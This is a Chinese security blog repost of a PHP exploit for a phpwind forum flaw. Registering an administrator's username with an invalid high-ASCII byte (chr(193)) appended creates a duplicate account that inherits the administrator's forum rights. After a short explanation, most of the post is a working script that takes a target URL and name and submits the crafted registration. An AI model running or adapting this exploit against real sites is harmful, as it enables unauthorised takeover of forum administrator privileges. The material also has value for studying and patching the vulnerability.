phpwind管理权限泄露漏洞利用程序PHP版 's

admin 2017年5月9日01:56:32评论572 views字数 921阅读3分4秒阅读模式
摘要

鬼仔:昨天发了phpwind管理权限泄露漏洞+利用程序,利用程序是python写的,很多朋友说不会用,今天看到yuehei同学的留言说他重写成PHP的了。

鬼仔:昨天发了phpwind管理权限泄露漏洞+利用程序,利用程序是python写的,很多朋友说不会用,今天看到yuehei同学的留言说他重写成PHP的了。

作者:yuehei
来源:yuehei 两点之间

一直订阅鬼仔的blog,今天发现PW又出漏洞
http://huaidan.org/archives/2036.html

漏洞原因是Mysql会舍弃没有用处的ASCII129-255,搜了资料也没有找到为什么,PW最大失误不是程序,而是没有把username设为唯一。

可以构造一个和某个管理人员名字一样的ID再加上一个无效的ASCII码进行注册,表中会出现二个一样的用户名,而forums.forumadmin字段里存的用户名,这样就可获得全部的前台权限。

使用PHP构造的测试代码。
phpwind管理权限泄露漏洞利用程序PHP版  's

<?php     if (empty($_GET['sub'])) {         print <<<EOT             <form action="" method="get"><br />             <input type="text" name="url" /><br />             <input type="text" name="regname" /><br />             <input type="submit" name="sub" value="提交" />             </form>     EOT;     } else {         extract($_GET);         $regname .= chr(193);         $data = array(             'regname' => $regname,             'regpwd' => 147852,             'regpwdrepeat' => 147852,             'regemail' => [email protected]',             'regemailtoall' => 1,             'step' => 2         );              $url .= '/register.php';         $includePath = ini_get('include_path');         $includePath .=';D:/www/pear';         ini_set('include_path', $includePath);         include('HTTP/Client.php');         $http = new HTTP_Client();         var_dump($http->post($url, $data));     }

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年5月9日01:56:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   phpwind管理权限泄露漏洞利用程序PHP版 'shttp://cn-sec.com/archives/47889.html

发表评论

匿名网友 填写信息